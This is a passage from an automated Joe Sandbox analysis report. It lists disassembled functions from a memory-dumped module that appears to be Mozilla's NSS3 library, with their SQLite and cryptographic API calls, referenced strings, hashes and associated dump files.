Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

free.MOZGLUE(?), ref: 6C80EE43

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$ErrorK11_memcpy$Alloc_DecryptEncryptUnlockUtilcalloc$CriticalCurrentEnterSectionThreadfree
String ID:
API String ID: 1743700497-0
Opcode ID: c2933eac2c29fba4e9fd843f26666a6fcd4749de3deec4d015f0182f8480329f
Instruction ID: a8b099eeca43b2fded2c047cb74d04e90ac0cced335c134e7315e0e0ecb09969
Opcode Fuzzy Hash: c2933eac2c29fba4e9fd843f26666a6fcd4749de3deec4d015f0182f8480329f
Instruction Fuzzy Hash: A53236B1604305DFDB24CF59C980A9BBBE1BF89308F14892DE99997761D331E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D2560 Relevance: 30.3, APIs: 10, Strings: 7, Instructions: 533stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C76CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7CF9C9,?,6C7CF4DA,6C7CF9C9,?,?,6C79369A), ref: 6C76CA7A
Part of subcall function 6C76CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C76CB26

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D25B2
memset.VCRUNTIME140(00000000,00000000,00000079), ref: 6C7D25DE
sqlite3_snprintf.NSS3(-0000000F,00000068,%s-shm,?), ref: 6C7D2604
sqlite3_initialize.NSS3 ref: 6C7D269D
sqlite3_uri_parameter.NSS3(?,readonly_shm), ref: 6C7D26D6
sqlite3_initialize.NSS3 ref: 6C7D289F
EnterCriticalSection.KERNEL32(?), ref: 6C7D29CD
LeaveCriticalSection.KERNEL32(?), ref: 6C7D2A26
sqlite3_free.NSS3(?), ref: 6C7D2B30

Strings

winShmMap3, xrefs: 6C7D2C08, 6C7D2C3D
winOpenShm, xrefs: 6C7D2B7E
winFileSize, xrefs: 6C7D2A7D
%s-shm, xrefs: 6C7D25FD
winShmMap2, xrefs: 6C7D2BD0
readonly_shm, xrefs: 6C7D26CE
winShmMap1, xrefs: 6C7D2AB0

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_initialize$memsetsqlite3_freesqlite3_snprintfsqlite3_uri_parameterstrlen
String ID: %s-shm$readonly_shm$winFileSize$winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 3867263885-4021692097
Opcode ID: c7d4bb844dc10f25d898426af418166a81e02054d8859b75378ff4e77505d2e0
Instruction ID: 294778feadef60ffee56e5b072aa1227f78e457ba50790a806bbb5c6305c44c9
Opcode Fuzzy Hash: c7d4bb844dc10f25d898426af418166a81e02054d8859b75378ff4e77505d2e0
Instruction Fuzzy Hash: 6212BD31A08301DFDB14DF25E948A6A77B1FF8A318F268528E80997B50DB34FC56CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C7DEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7DEF63

Part of subcall function 6C7E87D0: PORT_NewArena_Util.NSS3(00000800,6C7DEF74,00000000), ref: 6C7E87E8
Part of subcall function 6C7E87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C7DEF74,00000000), ref: 6C7E87FD
Part of subcall function 6C7E87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C7E884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C7DF2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7DF2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C7DF30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C7DF374
PL_strcasecmp.NSS3(6C922FD4,?), ref: 6C7DF457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C7DF4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7DF66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C7DF67D
CERT_DestroyName.NSS3(?), ref: 6C7DF68B

Part of subcall function 6C7E8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C7E8338
Part of subcall function 6C7E8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7E8364
Part of subcall function 6C7E8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C7E838E
Part of subcall function 6C7E8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7E83A5
Part of subcall function 6C7E8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E83E3

Part of subcall function 6C7E84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7E84D9
Part of subcall function 6C7E84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C7E8528

Part of subcall function 6C7E8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C7DF599,?,00000000), ref: 6C7E8955

Strings

oid., xrefs: 6C7DF2CF
*, xrefs: 6C7DF3C6
", xrefs: 6C7DF21B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: f56d6e36832ada72998208c292a836a111bb0f8dea519ddf4e655305bb48860c
Instruction ID: be0dd1d55c0c8fd82ad2c27d8d346c44881da44082a868871e3a483f3599719e
Opcode Fuzzy Hash: f56d6e36832ada72998208c292a836a111bb0f8dea519ddf4e655305bb48860c
Instruction Fuzzy Hash: C2223B7160C3414BD714CE28CA9036AB7E6AB85358F1A8A3EE5D587B92E731FC45C783

Uniqueness

Uniqueness Score: -1.00%

Function 6C83A5E0 Relevance: 23.1, APIs: 15, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26bb53b88128e52bffc1594e7126a5f10130db7dcd9bbfdb224d8e1f45e8f980
Instruction ID: b80d909559db75bf51eb86823b63efa2c847f060ed38c12ea38a71883d5768b0
Opcode Fuzzy Hash: 26bb53b88128e52bffc1594e7126a5f10130db7dcd9bbfdb224d8e1f45e8f980
Instruction Fuzzy Hash: 99124C70D081784FCF358AE88AD13E977F1AF4B318F287AE9C4AD57A41D2354A858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C810570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C8105E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C81061A
PK11_PubDeriveWithKDF.NSS3 ref: 6C810712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C810740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C810760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C8107AE
PK11_FreeSymKey.NSS3(?), ref: 6C8107BC
PK11_FreeSymKey.NSS3(?), ref: 6C8107D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8107DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8107EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C8107F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C81082F
memcpy.VCRUNTIME140(?,?,?), ref: 6C8108A9
SECITEM_DupItem_Util.NSS3(?), ref: 6C8108D0

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: 736bff669e07134f736c1a1d10d7355e5c636557535c5c0f160738253225748d
Instruction ID: 826b5b19576adeddbaa96a0bebde03840bf6600a4510540290c315e4d8527f5c
Opcode Fuzzy Hash: 736bff669e07134f736c1a1d10d7355e5c636557535c5c0f160738253225748d
Instruction Fuzzy Hash: 8891A471A0C3419BD720CF29DE44B5B77E1AF84318F148D2CE99987B91E731D865CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C76ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C76ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C76EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C76EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C76EF98

Strings

%s at line %d of [%.10s], xrefs: 6C76F492
database corruption, xrefs: 6C76F48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C76F483

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 3fa3f2ee12f2e836b79602aabd377886f4f0b1dafe7c5e192c8de5e0e0dd2cb6
Instruction ID: 714e875f79d6a78d4ef55d9517cc66ef2926faa2735ca5eac17feb4168463fcb
Opcode Fuzzy Hash: 3fa3f2ee12f2e836b79602aabd377886f4f0b1dafe7c5e192c8de5e0e0dd2cb6
Instruction Fuzzy Hash: DE62F470A04249CFEB14CF2ACA4479ABBB1BF4531CF1841A9DC555BF92D735E886CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C810EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C810F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C810FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C811006
PK11_FreeSymKey.NSS3(?), ref: 6C81101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C811033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C81103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C811048
memcpy.VCRUNTIME140(?,?,?), ref: 6C81108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8110BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C8110D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C81112E

Part of subcall function 6C811570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C8108C4,?,?), ref: 6C8115B8
Part of subcall function 6C811570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C8108C4,?,?), ref: 6C8115C1
Part of subcall function 6C811570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C81162E
Part of subcall function 6C811570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C811637

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 345863e32090a67d13529f1bec29f816c1097a23239558485387c90e78d6bdef
Instruction ID: 53fb711bf1b1c99f6f8a2411db1013bc53eb4e9854491724e18f899183820a7e
Opcode Fuzzy Hash: 345863e32090a67d13529f1bec29f816c1097a23239558485387c90e78d6bdef
Instruction Fuzzy Hash: 1271E471E082068FDB20CFA9CE85A6AF7F0BF54318F148A2CE91997B11E731D954CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6C7CC650 Relevance: 16.5, APIs: 7, Strings: 2, Instructions: 760COMMON

Download Yara Rule

Strings

0123456789ABCDEF, xrefs: 6C7CD104
0123456789abcdef, xrefs: 6C7CC859

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 0-885041942
Opcode ID: cc2edd1ee3d2498cabe6e059eca9c389ef5535ba053afc5136cd53e84e2f2849
Instruction ID: a7309bb1f867bcd1f318123cfaceec04aff3241fdb4da7e0831d721bc43951e5
Opcode Fuzzy Hash: cc2edd1ee3d2498cabe6e059eca9c389ef5535ba053afc5136cd53e84e2f2849
Instruction Fuzzy Hash: 6A5200307487028FD714DF28C69075ABBE2EF86359F188A2DE8A997751D734D846CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B8550 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 528stringCOMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000021B,recovered %d pages from %s,00000000,?), ref: 6C8B85CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B86CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B875F
memset.VCRUNTIME140(?,00000000,?), ref: 6C8B893A
sqlite3_free.NSS3(?), ref: 6C8B8977
sqlite3_free.NSS3 ref: 6C8B89A5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8B8B68
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8B8B79

Strings

recovered %d pages from %s, xrefs: 6C8B85C2

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_free$memsetsqlite3_logstrcmpstrlen
String ID: recovered %d pages from %s
API String ID: 1138475946-1623757624
Opcode ID: e0fdc2af61f88e8db7564419f0448423585c002895caa7f001a090be8314d826
Instruction ID: 416509fe09dfe28cf3f542f6861722b882fd92a361bf6bdec0d1e2424ec309c8
Opcode Fuzzy Hash: e0fdc2af61f88e8db7564419f0448423585c002895caa7f001a090be8314d826
Instruction Fuzzy Hash: 341229746083029FD714DF29CA84B5BBBF5AF89308F148D2DE99A97751E730E805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C836C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7E1C6F,00000000,00000004,?,?), ref: 6C836C3F

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C7E1C6F,00000000,00000004,?,?), ref: 6C836C60
PR_ExplodeTime.NSS3(00000000,6C7E1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C7E1C6F,00000000,00000004,?,?), ref: 6C836C94

Strings

gfff, xrefs: 6C836CF5
gfff, xrefs: 6C836CFD
gfff, xrefs: 6C836D9C
gfff, xrefs: 6C836D30
gfff, xrefs: 6C836D66

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 6771eea0b0e9c63bbc0c54fd1f3b4bcf0a3af0fa26db0695b435496175b91b75
Instruction ID: a70e8a5942f709e5ab95695b6c0c6fe4899de28a3441f5d306bc3cfff9dc5b9e
Opcode Fuzzy Hash: 6771eea0b0e9c63bbc0c54fd1f3b4bcf0a3af0fa26db0695b435496175b91b75
Instruction Fuzzy Hash: 93514B72B016494FC71CCDADDD526DAB7DAABE4310F48C23AE842DB781E638D906C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B9209

Strings

UUUU, xrefs: 6C8B9255
3333, xrefs: 6C8B925E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: d919de53c4500421d61ab71c848e219875f66d19dede62820b70b3ef06f1fbdb
Instruction ID: ce0c400bbb19a27dc2a6ab2d74a18cecb2b1182ed7e55ddc5b0235efb5435548
Opcode Fuzzy Hash: d919de53c4500421d61ab71c848e219875f66d19dede62820b70b3ef06f1fbdb
Instruction Fuzzy Hash: 4AA1AF72E001159BDB14CB69CD80BAEB7B5BF48328F194539E919B7341E736EC16CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C77AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C89CF46,?,6C76CDBD,?,6C89BF31,?,?,?,?,?,?,?), ref: 6C77B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C89CF46,?,6C76CDBD,?,6C89BF31), ref: 6C77B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C89CF46,?,6C76CDBD,?,6C89BF31), ref: 6C77B0A2
CloseHandle.KERNEL32(?,?,6C89CF46,?,6C76CDBD,?,6C89BF31,?,?,?,?,?,?,?,?,?), ref: 6C77B100
sqlite3_free.NSS3(?,?,00000002,?,6C89CF46,?,6C76CDBD,?,6C89BF31,?,?,?,?,?,?,?), ref: 6C77B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C89CF46,?,6C76CDBD,?,6C89BF31), ref: 6C77B12D

Part of subcall function 6C769EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C77C6FD,?,?,?,?,6C7CF965,00000000), ref: 6C769F0E
Part of subcall function 6C769EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7CF965,00000000), ref: 6C769F5D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 06a75dcdbb7bcf8ac39d79118f32863cbfce5227c7fa2a6d3b809f2ae811dad1
Instruction ID: 924caaf2f59f26068daf87935df0b8f3b5a86dc8683af167ea420d1f77c7701e
